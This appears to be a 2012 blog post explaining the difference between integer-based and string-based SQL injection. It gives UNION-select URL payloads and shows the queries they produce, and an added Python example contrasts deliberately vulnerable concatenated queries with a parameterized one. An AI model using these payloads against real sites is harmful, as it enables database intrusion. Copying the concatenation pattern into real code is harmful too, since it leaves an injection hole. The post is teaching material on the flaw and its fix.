Friday, August 10, 2012

Difference between integer based and string based SQL injection

Hi friends, I had posted a question on hackforums about the difference between string based and integer based SQL injection. It can be explained as follows:
integer

SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1
so the injection would be
?id=10 union select 1,2,3--
finally you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1

string

SELECT * FROM pages WHERE page_id='10[inject]' order by title limit 1,1
so the injection would be
?id=10' union select 1,2,3--+
final:
select * from pages where page_id='10' union select 1,2,3-- ' order by title limit 1,1


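So in integer based SQL injection you don't have to put a ', and in string based SQL injection you have to put a ' and a + sign at the end. The ' closes the quoted value, and the + is the URL-encoded space that follows --, so the rest of the query, including the leftover closing quote, is treated as a comment.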
the original post here
enjoy
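
Both contexts share one root cause: the id value is concatenated into the query text. The example below is added here and is not from the original post; it rebuilds both query shapes in an in-memory SQLite database and shows that a bound parameter treats the same inputs as plain data. The table contents, function names and the simplified LIMIT 1 are assumptions.

```python
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Constructed sample data; three columns to match "union select 1,2,3".
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (page_id INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [(10, "Home", "welcome"), (11, "About", "about us")])
    return db

def vulnerable_integer(db, raw_id):
    # Integer context: the value is concatenated without quotes.
    sql = "SELECT * FROM pages WHERE page_id=" + raw_id + " ORDER BY title LIMIT 1"
    return db.execute(sql).fetchall()

def vulnerable_string(db, raw_id):
    # String context: the value is concatenated between single quotes.
    sql = "SELECT * FROM pages WHERE page_id='" + raw_id + "' ORDER BY title LIMIT 1"
    return db.execute(sql).fetchall()

def safe_lookup(db, raw_id):
    # Bound parameter: the driver passes raw_id as data, never as SQL text,
    # so neither the quote nor the comment marker changes the statement.
    sql = "SELECT * FROM pages WHERE page_id=? ORDER BY title LIMIT 1"
    return db.execute(sql, (raw_id,)).fetchall()

# The two inputs from the post, as the server sees them after URL decoding
# ("+" becomes the space after "--").
INT_INPUT = unquote_plus("10 union select 1,2,3--")
STR_INPUT = unquote_plus("10' union select 1,2,3--+")

if __name__ == "__main__":
    db = make_db()
    for name, fn, value in [("integer", vulnerable_integer, INT_INPUT),
                            ("string", vulnerable_string, STR_INPUT)]:
        print(name, "concatenated:", fn(db, value))
        print(name, "bound param: ", safe_lookup(db, value))
```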
